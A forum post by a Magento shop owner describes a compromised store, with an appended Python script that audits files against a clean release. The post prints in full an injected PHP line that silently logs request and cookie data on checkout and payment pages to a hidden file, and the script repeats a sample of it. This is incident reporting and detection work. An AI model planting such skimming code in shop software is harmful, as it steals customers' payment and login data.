Since this morning, I get the following PHP notice after starting the Magento cronjob:
Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1
I did not modify any of the mage files. How is this possible?
EDIT: For now, I edited Autoload.php to first check whether REQUEST_URI is set.
Original:
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
New:
<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
EDIT 30-04-2015:
After reading the comments of @volkan and @b.enoit.be, I immediately replaced the specified file with the original one from Magento, and the line really was not present!
Below is the malicious string that was present in Autoload.php:
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>
I also checked:
- /js/index.php similar to the original
- /index.php as the original
- Magpleasure_Filesystem module was not present
However, there were two new administrators who had obscure names:
- backup copy - auto_bc@magent.com <- this domain leads to the domain containing the pages, and the email contains Russian results on Google
- database - db@local.host
Both users have been deleted. The website was also vulnerable to the Shoplift exploit (which is fixed in the latest security patch).
We are currently busy installing the latest security fixes.
This seems to be a recent issue:
- 100,000 web stores are open to compromise, because attackers use the error Magento
- Magento Shoplift Bug Tester v1.0
Thanks to all users for their help.
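
The checks described in the post (comparing files with the stock release, looking for the injected line and for its collection file), as an added Python example that is not part of the original post. The function names, the regex heuristics and the sample trees built in `demo()` are assumptions constructed for illustration; `pristine` is assumed to be an unpacked copy of the same Magento release as the installed shop.

```python
import hashlib, re, tempfile
from pathlib import Path
# Heuristics taken from the injected line quoted in the post: request or cookie
# data being serialized, and a URI filter on checkout/payment pages.
SUSPICIOUS = [
    re.compile(r"serialize\s*\(\s*\$_(REQUEST|POST|COOKIE)"),
    re.compile(r"preg_match\s*\(\s*[\"']/[^\"']*(checkout|payment)[^\"']*/[\"']\s*,\s*\$_SERVER"),
]
# Collection file named in the post (path relative to the Magento root).
DROP_FILE = "media/catalog/product/cache_catalogs"

def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit(installed, pristine, exts=(".php", ".phtml")):
    """Compare code files under `installed` with a clean copy of the same release."""
    installed, pristine = Path(installed), Path(pristine)
    report = {"modified": [], "added": [], "suspicious": [], "drop_file": False}
    for f in sorted(installed.rglob("*")):
        if not f.is_file() or f.suffix.lower() not in exts:
            continue
        rel = f.relative_to(installed)
        ref = pristine / rel
        if not ref.is_file():
            report["added"].append(rel.as_posix())      # file unknown to the release
        elif digest(f) != digest(ref):
            report["modified"].append(rel.as_posix())   # core file was changed
        text = f.read_text(errors="replace")
        if any(p.search(text) for p in SUSPICIOUS):
            report["suspicious"].append(rel.as_posix())
    report["drop_file"] = (installed / DROP_FILE).is_file()
    return report

def demo():
    """Build two constructed trees (clean and tampered) and audit them."""
    clean = "<?php\nclass Varien_Autoload {}\n"
    injected = ('<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))'
                '{@file_put_contents("x", serialize($_REQUEST), FILE_APPEND);}?>')
    with tempfile.TemporaryDirectory() as tmp:
        for tree, body in (("pristine", clean), ("installed", injected + clean)):
            target = Path(tmp, tree, "lib/Varien/Autoload.php")
            target.parent.mkdir(parents=True)
            target.write_text(body)
        drop = Path(tmp, "installed", DROP_FILE)
        drop.parent.mkdir(parents=True)
        drop.write_text("constructed sample")
        return audit(Path(tmp, "installed"), Path(tmp, "pristine"))

if __name__ == "__main__":
    print(demo())
```

Any path reported as modified or added in core directories such as `lib/` or `app/code/core/` deserves a manual diff, since a regex match alone can miss obfuscated variants of the injected code.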